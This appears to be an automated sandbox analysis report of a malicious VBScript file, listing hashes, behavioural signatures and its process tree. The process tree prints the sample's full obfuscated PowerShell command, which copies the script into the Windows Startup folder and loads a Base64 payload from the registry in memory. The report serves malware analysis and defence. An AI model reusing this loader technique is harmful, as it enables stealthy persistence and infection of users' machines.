Analysis
-
max time kernel
23s -
max time network
28s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-09-2024 19:33
Static task
static1
General
-
Target
Main.vbs
-
Size
645KB
-
MD5
a03581c351404c25974d9d8c022cabd1
-
SHA1
daf6e824953e089737b01d0c4056cdc0992850b9
-
SHA256
b84c3c1e700100c0d6b1c772095a3906b1182396f1d3edc4a54edb9b6b1f14ee
-
SHA512
fa1b0b446e3fc8784ade996a2646d0e1b7ed8c3ee15ef78ede8c1d2a06ae9b68df631faea3164850c9b8e92ba030d0175e535b0993a7d06bdaa83529b0b16bb4
-
SSDEEP
12288:ckOTDFNXjOsggjpM3IzJquTTYuDu6pELjN/nwVNN6:c/VNlVjpRJ7TTYuDfcjN/wDA
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.vbs powershell.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\$77-system32.vbs taskmgr.exe -
pid Process 1816 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 1816 powershell.exe 1816 powershell.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1816 powershell.exe Token: SeDebugPrivilege 4892 taskmgr.exe Token: SeSystemProfilePrivilege 4892 taskmgr.exe Token: SeCreateGlobalPrivilege 4892 taskmgr.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe 4892 taskmgr.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 1800 wrote to memory of 1816 1800 WScript.exe 87 PID 1800 wrote to memory of 1816 1800 WScript.exe 87
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Main.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Main.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-system32.vbs'; $Xerox = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $Xerox = -join $Xerox[-1..-$Xerox.Length];[<##>AppDomain<##>]::<##>('disdiapasonurrentDomain'.replace('disdiapason','C'))<##>.<##>('inappetencyoad'.replace('inappetency','L'))([Convert]::FromBase64String($Xerox))<##>.<##>('ActinidiaceaentryPoint'.replace('Actinidiaceae','E'))<##>.<##>('Inhistaminaseoke'.replace('histaminase','v'))($Null,$Null)<##>;2⤵
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4892
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
645KB
MD5a03581c351404c25974d9d8c022cabd1
SHA1daf6e824953e089737b01d0c4056cdc0992850b9
SHA256b84c3c1e700100c0d6b1c772095a3906b1182396f1d3edc4a54edb9b6b1f14ee
SHA512fa1b0b446e3fc8784ade996a2646d0e1b7ed8c3ee15ef78ede8c1d2a06ae9b68df631faea3164850c9b8e92ba030d0175e535b0993a7d06bdaa83529b0b16bb4